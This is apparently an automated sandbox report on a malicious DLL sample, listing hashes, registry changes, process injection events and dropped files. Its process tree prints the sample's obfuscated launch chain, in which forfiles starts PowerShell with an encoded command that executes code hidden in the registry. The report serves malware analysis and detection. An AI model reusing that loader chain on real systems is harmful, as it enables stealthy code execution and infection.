Analysis
-
max time kernel
93s -
max time network
134s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
13-11-2020 10:22
Static task
static1
Behavioral task
behavioral1
Sample
be294b6faca17e762d1722ea1e447a3ad3a57b4c110cfe8ff515e3d2047c5ad2.dll
Resource
win7v20201028
Behavioral task
behavioral2
Sample
be294b6faca17e762d1722ea1e447a3ad3a57b4c110cfe8ff515e3d2047c5ad2.dll
Resource
win10v20201028
General
-
Target
be294b6faca17e762d1722ea1e447a3ad3a57b4c110cfe8ff515e3d2047c5ad2.dll
-
Size
136KB
-
MD5
fe590fd117449bce4bfad57d36bfc099
-
SHA1
a5c3d7738ebc1f1ce8353e135b8dcea17155077b
-
SHA256
be294b6faca17e762d1722ea1e447a3ad3a57b4c110cfe8ff515e3d2047c5ad2
-
SHA512
f8e39f1e83dd666fff67161864c75057a0f6b4ad1692f0013f0aef47d69ed350662f0784555a72fcdb34bb5937371c7d75010639d5ae31c32d7383ee10a6605b
Malware Config
Signatures
-
Blacklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 24 996 rundll32.exe -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FC610462-25A2-11EB-B59A-EE9C0FE9D2F9} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3504185545" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cad0ccd232972468e753df42302a60a00000000020000000000106600000001000020000000c803d06a1c014c55126963368b4037546fe7f55cd0372a2a01be9bd2402a9093000000000e800000000200002000000019e5a96e2d0b0ba51f83c5c51d2fbeb6920f0c098d15275a815674aa15895436200000007a16900cfac73f2ecc4880096898ed5fadddae473448642d32cdc5e2fd94bf8140000000f608bc859a8f5b4ce38376c806592f77572c6e70a39342f75b62beb6bc125b7cb45406a2ae21c38ac25a4031092bf9597ba04da0aed00c0ca8d2a192ff991c4b iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30849455" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30849455" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 303caad4afb9d601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001cad0ccd232972468e753df42302a60a0000000002000000000010660000000100002000000048d5c17fed482417f28f02def8625616425b148ceb88d21ab7bd00a7870ca3b1000000000e800000000200002000000066eb5e95c6847a7abf3d2e4c2d615d4bd049178b50706c618af60fafb26fb72420000000f3b2cd4f06ef80f47664a57cda33c8ca4255d7bf8a41562588c7aa01baf7ccc440000000f7df1699d508f90708a67e26797c72fa5a944e26500d28c1d2f0a9423fce7ea8b6dea40fc0bb8544972183ae2eda2ebaa1cbf5eeb12bac675c372d39ec408533 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f05cc9d4afb9d601 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3504185545" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2128 powershell.exe 2128 powershell.exe 2128 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exerundll32.exepid process 2128 powershell.exe 996 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2128 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 1492 iexplore.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 1492 iexplore.exe 1492 iexplore.exe 3456 IEXPLORE.EXE 3456 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
rundll32.exeiexplore.execmd.exeforfiles.execmd.exepowershell.execsc.execsc.exerundll32.exedescription pid process target process PID 640 wrote to memory of 996 640 rundll32.exe rundll32.exe PID 640 wrote to memory of 996 640 rundll32.exe rundll32.exe PID 640 wrote to memory of 996 640 rundll32.exe rundll32.exe PID 1492 wrote to memory of 3456 1492 iexplore.exe IEXPLORE.EXE PID 1492 wrote to memory of 3456 1492 iexplore.exe IEXPLORE.EXE PID 1492 wrote to memory of 3456 1492 iexplore.exe IEXPLORE.EXE PID 1836 wrote to memory of 1864 1836 cmd.exe forfiles.exe PID 1836 wrote to memory of 1864 1836 cmd.exe forfiles.exe PID 1864 wrote to memory of 2052 1864 forfiles.exe cmd.exe PID 1864 wrote to memory of 2052 1864 forfiles.exe cmd.exe PID 2052 wrote to memory of 2128 2052 cmd.exe powershell.exe PID 2052 wrote to memory of 2128 2052 cmd.exe powershell.exe PID 2128 wrote to memory of 4012 2128 powershell.exe csc.exe PID 2128 wrote to memory of 4012 2128 powershell.exe csc.exe PID 4012 wrote to memory of 2304 4012 csc.exe cvtres.exe PID 4012 wrote to memory of 2304 4012 csc.exe cvtres.exe PID 2128 wrote to memory of 2808 2128 powershell.exe csc.exe PID 2128 wrote to memory of 2808 2128 powershell.exe csc.exe PID 2808 wrote to memory of 3856 2808 csc.exe cvtres.exe PID 2808 wrote to memory of 3856 2808 csc.exe cvtres.exe PID 2128 wrote to memory of 2868 2128 powershell.exe Explorer.EXE PID 996 wrote to memory of 2868 996 rundll32.exe Explorer.EXE
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\be294b6faca17e762d1722ea1e447a3ad3a57b4c110cfe8ff515e3d2047c5ad2.dll,#12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\be294b6faca17e762d1722ea1e447a3ad3a57b4c110cfe8ff515e3d2047c5ad2.dll,#13⤵
- Blacklisted process makes network request
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATgBlAHQAaQBkACcAKQAuAFQA & exit" /p C:\Windows\system32 /s /m po*l.e*e2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\forfiles.exeforfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATgBlAHQAaQBkACcAKQAuAFQA & exit" /p C:\Windows\system32 /s /m po*l.e*e3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATgBlAHQAaQBkACcAKQAuAFQA & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATgBlAHQAaQBkACcAKQAuAFQA5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\15pcfqs2\15pcfqs2.cmdline"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6429.tmp" "c:\Users\Admin\AppData\Local\Temp\15pcfqs2\CSCDAEE5FC6489A4EFC9D6F70A4B78334CA.TMP"7⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eak03o5o\eak03o5o.cmdline"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6543.tmp" "c:\Users\Admin\AppData\Local\Temp\eak03o5o\CSC8F5B777C759A49EBAA7949676E152E2F.TMP"7⤵
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1492 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08MD5
a69fba04d9b13e82fb772d1b38b6054a
SHA1f7ab8c1d32ddc58e13f65f9b8bb0cc844f164454
SHA256733d04f9d9e1fdf85914f097cca3f8bfb3926c38a7ccf69e7c74d887abbc64ff
SHA5126fae50c73cc08c48d5ecb6814785f82c46ded1dc00ba9a8b02a9b2bd907a10bba6015e0a5753487a12765db242162ce4f822bf5d3381a71ae2143c9f5d34669a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08MD5
02ce44e6486d7afe7ffe62ba86aca760
SHA12fa384f71eb138a8470254e4eac8f3a44b388845
SHA256dabc99ca73513f7b2e26a24ba0170393028d9e1ab7fb0baa6e48c10739914c10
SHA512abafeff3eaf0bebfe18b9d476660351c80f485b5f7c0aec7bdf44fdefbd639035d997992e0526cab76bdcc43b5bd76cdf07c1bd4d7defebbb297ddd9e2d58026
-
C:\Users\Admin\AppData\Local\Temp\15pcfqs2\15pcfqs2.dllMD5
c4bb3a721ce675a9e9fcb6896574055d
SHA16172a7ee1cc34c8b43ca0ee93fb70c99c3d6d099
SHA2568da8d28e071c6977c1d27ad42a887ec927c8486efdbcd33991f6c92ffdcb58b2
SHA512fb24c2123a8dade2694a5f18995a82a7a7896a38d4d4562d04e5ec931f0a99acac658f4a08002f70c57f876af9c4c12026dd345782fb8995d058ed0e3725f896
-
C:\Users\Admin\AppData\Local\Temp\RES6429.tmpMD5
003a47f5f773cff04c7f1afd033ab0d0
SHA12bbcfdc0d8c9b36d9a70fa3a265f7a41aaf674fb
SHA25672d44ce7560a6e92527c33f479bfc3d72bc8678dac03973be017861d01eae9b8
SHA512979839fd96bf48ef344b5c5bda4306e2f42642c05c96a048d5b25de5ac265826b8c500c0b9371484b185cc388a70248c540c2fdd7f7acbf08795954689c15085
-
C:\Users\Admin\AppData\Local\Temp\RES6543.tmpMD5
22294636ae434bc1e2f45ea225e1ac43
SHA1f7025354a53c970d2586f0e36d9ed5f43dc20fea
SHA256726202f42874376d42f4faff01e12ffc8f29a8e5316c6b0e2c71d93af02454e6
SHA512741ce2917689adb73cda7e8b3ec739427afb393d8cffd998d17384856695dfbb8ec12de72900820a7ce2d848517e9fa9abfffb1327bc4b85f408e908c0730ccb
-
C:\Users\Admin\AppData\Local\Temp\eak03o5o\eak03o5o.dllMD5
5b49d4c23b8732625271589f3104a62b
SHA1a67867766df269d2ac9dd81e29f7d269f0bfbf0a
SHA256712efd2b55c9586b287c1dfa0bf0a97ad63b8f5302c196138c8bff2796c7fc5a
SHA512db47062eb31ac3913bc15a6572d61229c629ceaeeec33afb17c869ad622e004e5f65923f7f3b17d77c9e709d74715359de2139a97048bdbbb17e2fa6917a6326
-
\??\c:\Users\Admin\AppData\Local\Temp\15pcfqs2\15pcfqs2.0.csMD5
aee5ecef6b6a9b4372991443276b71ce
SHA1911bd26fba4c5e51423f2c6339cc267f8697f339
SHA25690e03a7c9cb196fd260c54663a4c867f33621ac29746cd8c0a4b2aa9b390754a
SHA512cf99d4941aa5d1a4dd3abd5ca7a4d3d19a7f497c3247fd09505e263a9a4646b81eb19d7a9312b17a00d22ca9881b6d725b76013b7dc470dcc964b77970c96cc3
-
\??\c:\Users\Admin\AppData\Local\Temp\15pcfqs2\15pcfqs2.cmdlineMD5
6f0c0054664514e62e8ea4c186ce81f5
SHA10a2443e0e28511f267d5db426dd6a271b2505f8d
SHA25602dc55d832a9371fa6e80bc955a7c41e5a0a74e87232397b0cfef536277766ac
SHA512d1cb12ab217f8bc0095c9d131c7fae93d16a5ae685e3cc5ec4a4866b9bfb413aa9be6fc10a1931823353b79ae6c44cd796ea7418ef0bdfd328e0d060da15845f
-
\??\c:\Users\Admin\AppData\Local\Temp\15pcfqs2\CSCDAEE5FC6489A4EFC9D6F70A4B78334CA.TMPMD5
816cd2d058e61861e20ed5302e89e6ab
SHA1007554efaace08f697e59d6c6340df24c7cd1aa9
SHA256fee25bcbc5444cb7b91f08f8a8fedcdc425f85d89084386333dcf6a9acc398d2
SHA512f74185f7dee991145366ff9835ca1847734fe8f4c704a68ec73204b17c264ee9e53b9a321c983f9f24c49112c5498caf712b65db7ba8a759dd65ec48ff2a96ac
-
\??\c:\Users\Admin\AppData\Local\Temp\eak03o5o\CSC8F5B777C759A49EBAA7949676E152E2F.TMPMD5
ad98ca2bcf33cb3ae42b9ac3d0ebe532
SHA175df7853188b5d3eba6e62d858c7908657087ff0
SHA2560c84f88fce765101bccecc6ea3ad8ae27fd5a53ae6708a8bcc0c7eb28065b6df
SHA512940a238073de5a4d916de0eafc20a2e933e780d4f808ca541889fd4ec77f37173802f24d8ca5543665e8cff553b41ab4cbca665568e9ddb79723eda055cd48a0
-
\??\c:\Users\Admin\AppData\Local\Temp\eak03o5o\eak03o5o.0.csMD5
a5043957e07dbe0dee7bb8aad13a403e
SHA1571c9136e0e90d016dd83b24c40eadbf7186c701
SHA25673775570d08cc971668d853274b7c9a0cfb407cf76480747b9e38542e5dc53c9
SHA51214f98e4902059980ed8f46c72fdefeb404f14df0fa06628476d63f9bb9ed76fd6398abd4de8c1de7dfa2a8b2108c31e2b9b668acfc92958c1eecc4a0c8d656a1
-
\??\c:\Users\Admin\AppData\Local\Temp\eak03o5o\eak03o5o.cmdlineMD5
f06989497413c5987e8de8ad6ffd43ab
SHA1110ad454dae9931f667740c4284279edf3cd749d
SHA256b582c4369c983b7b329326f80f352200177d69965b6792b6af808d3ae06ac9b0
SHA512827113bcaf445f8fea380577869929bdec887994957b3a3d11ee35f7387e7c45fdce5f167f068440f768f2addecb46c2567846993ee62b1a4950f93ed6cc271c
-
memory/996-30-0x0000000004310000-0x0000000004328000-memory.dmpFilesize
96KB
-
memory/996-1-0x0000000004720000-0x0000000004732000-memory.dmpFilesize
72KB
-
memory/996-0-0x0000000000000000-mapping.dmp
-
memory/1864-5-0x0000000000000000-mapping.dmp
-
memory/1864-6-0x0000000000000000-mapping.dmp
-
memory/2052-7-0x0000000000000000-mapping.dmp
-
memory/2128-9-0x00007FF9E63D0000-0x00007FF9E6DBC000-memory.dmpFilesize
9.9MB
-
memory/2128-19-0x000002711B390000-0x000002711B391000-memory.dmpFilesize
4KB
-
memory/2128-8-0x0000000000000000-mapping.dmp
-
memory/2128-10-0x000002711B340000-0x000002711B341000-memory.dmpFilesize
4KB
-
memory/2128-27-0x000002711B3A0000-0x000002711B3A1000-memory.dmpFilesize
4KB
-
memory/2128-28-0x0000027136020000-0x0000027136038000-memory.dmpFilesize
96KB
-
memory/2128-11-0x0000027136080000-0x0000027136081000-memory.dmpFilesize
4KB
-
memory/2304-15-0x0000000000000000-mapping.dmp
-
memory/2808-20-0x0000000000000000-mapping.dmp
-
memory/3456-2-0x0000000000000000-mapping.dmp
-
memory/3856-23-0x0000000000000000-mapping.dmp
-
memory/4012-12-0x0000000000000000-mapping.dmp